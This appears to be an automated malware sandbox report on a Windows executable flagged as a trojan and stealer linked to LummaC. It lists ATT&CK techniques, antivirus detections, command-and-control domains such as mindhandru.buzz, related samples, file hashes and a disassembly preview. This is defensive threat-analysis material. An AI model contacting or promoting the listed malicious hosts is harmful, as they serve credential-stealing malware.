                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		851
                Security Software Discovery                		Remote Services41
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory44
                Virtualization/Sandbox Evasion                		Remote Desktop ProtocolData from Removable Media2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS1
                File and Directory Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets223
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                AaEBZ7icLd.exe57%VirustotalBrowse
                AaEBZ7icLd.exe58%ReversingLabsWin32.Trojan.Generic
                AaEBZ7icLd.exe100%AviraTR/Crypt.XPACK.Gen
                AaEBZ7icLd.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://mindhandru.buzz:443/apil100%Avira URL Cloudmalware
                https://mindhandru.buzz/apiwa2C6100%Avira URL Cloudmalware
                https://mindhandru.buzz/s100%Avira URL Cloudmalware
                https://mindhandru.buzz/gaBC8100%Avira URL Cloudmalware
                http://crl.microsoft&0%Avira URL Cloudsafe
                https://mindhandru.buzz/ms100%Avira URL Cloudmalware
                https://mindhandru.buzz/piP100%Avira URL Cloudmalware
                https://mindhandru.buzz/P100%Avira URL Cloudmalware
                https://mindhandru.buzz/Y100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                mindhandru.buzz
                		172.67.165.185
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    		high
                    rebuildeso.buzzfalse
                      		high
                      appliacnesot.buzzfalse
                        		high
                        screwamusresz.buzzfalse
                          		high
                          cashfuzysao.buzzfalse
                            		high
                            inherineau.buzzfalse
                              		high
                              prisonyfork.buzzfalse
                                		high
                                hummskitnj.buzzfalse
                                  		high
                                  mindhandru.buzzfalse
                                    		high
                                    https://mindhandru.buzz/apifalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabAaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://mindhandru.buzz:443/apilAaEBZ7icLd.exe, 00000000.00000002.2352761941.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://duckduckgo.com/ac/?q=AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoAaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.microsoftAaEBZ7icLd.exe, 00000000.00000003.2279767060.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301994724.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278178086.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275790023.0000000001083000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://mindhandru.buzz/msAaEBZ7icLd.exe, 00000000.00000003.2301854330.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301952073.00000000010F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://mindhandru.buzz/sAaEBZ7icLd.exe, 00000000.00000003.2301854330.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301952073.00000000010F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://mindhandru.buzz/apiwa2C6AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://mindhandru.buzz/gaBC8AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiAaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://mindhandru.buzz/AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2318964412.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275772729.00000000010FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ocsp.rootca1.amazontrust.com0:AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://mindhandru.buzz/piAaEBZ7icLd.exe, 00000000.00000002.2353089442.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275750558.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2249900831.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276125542.00000000010F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://mindhandru.buzz/piPAaEBZ7icLd.exe, 00000000.00000003.2275750558.00000000010F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://www.ecosia.org/newtab/AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaAaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://mindhandru.buzz:443/apiAaEBZ7icLd.exe, 00000000.00000002.2352761941.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://mindhandru.buzz/YAaEBZ7icLd.exe, 00000000.00000003.2251208237.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2249900831.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2250351988.00000000010F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://crl.microsoft&AaEBZ7icLd.exe, 00000000.00000003.2343494094.00000000010CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgAaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgAaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://x1.c.lencr.org/0AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://x1.i.lencr.org/0AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refAaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://mindhandru.buzz/PAaEBZ7icLd.exe, 00000000.00000002.2353089442.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2319423730.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2343601449.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2343643486.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2318964412.00000000010EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://support.mozilla.org/products/firefoxgro.allAaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            172.67.165.185
                                                                                            		mindhandru.buzzUnited States
                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1581237
                                                                                            Start date and time:2024-12-27 08:58:08 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 5m 27s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:4
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:AaEBZ7icLd.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:52135372423d0e2a9e1a9c11c188df25.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                            EGA Information:Failed
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 0
                                                                                            • Number of non-executed functions: 0
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 40.126.53.17, 104.208.16.94, 13.107.246.63, 52.149.20.212
                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target AaEBZ7icLd.exe, PID 5632 because there are no executed function
                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            02:59:11API Interceptor8x Sleep call for process: AaEBZ7icLd.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            172.67.165.185cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                              ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                  7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                    oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                      zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                        U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                          ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                              r06aMlvVyM.exeGet hashmaliciousLummaCBrowse

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                mindhandru.buzzcFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                • 104.21.11.101
                                                                                                                ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.11.101
                                                                                                                PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 172.67.165.185
                                                                                                                zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUScFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                • 104.21.11.101
                                                                                                                ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 104.21.11.101
                                                                                                                Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.11.101
                                                                                                                PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.11.101
                                                                                                                oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 172.67.165.185

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                a0e9f5d64349fb13191bc781f81f42e1cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                • 172.67.165.185
                                                                                                                ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 172.67.165.185
                                                                                                                PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185
                                                                                                                oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                • 172.67.165.185
                                                                                                                zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.165.185

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                No created / dropped files found

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.949884913522183
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:AaEBZ7icLd.exe
                                                                                                                File size:1'883'648 bytes
                                                                                                                MD5:52135372423d0e2a9e1a9c11c188df25
                                                                                                                SHA1:6809f399ba1106c2761da024156ebd606febfe39
                                                                                                                SHA256:ad7dbcf74d0a449e97d6e4c94ce91f2c0b02414ae40ebfd523bffaa00ce1e29f
                                                                                                                SHA512:a04bf6c1d9de2c867812061c469143e1a830531b35b79d3e52e157c27956da0dddb6fe301377c0ce05edca993ddbb7ac6e4f34356a1a979e3db9d76bc71e426a
                                                                                                                SSDEEP:49152:Tsq1J8omtqRGb/UXhbWvXrtBo+IGKLBmjgLNp5E:Tsq111RMcbWvXrHo+IPOgpp5
                                                                                                                TLSH:9895337F2D92D4B2C5BEC037910F3C0DE860AD9601E12D7F2D99DBB651E369AE2714A0
                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................`J...........@...........................J...........@.................................Y@..m..

                                                                                                                File Icon

                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x8a6000
                                                                                                                Entrypoint Section:.taggant
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                jmp 00007F909CD000CAh
                                                                                                                setl byte ptr [eax+eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                jmp 00007F909CD020C5h
                                                                                                                add byte ptr [esi], al
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], dl
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [edx], al
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [esi], al
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [edx], al
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
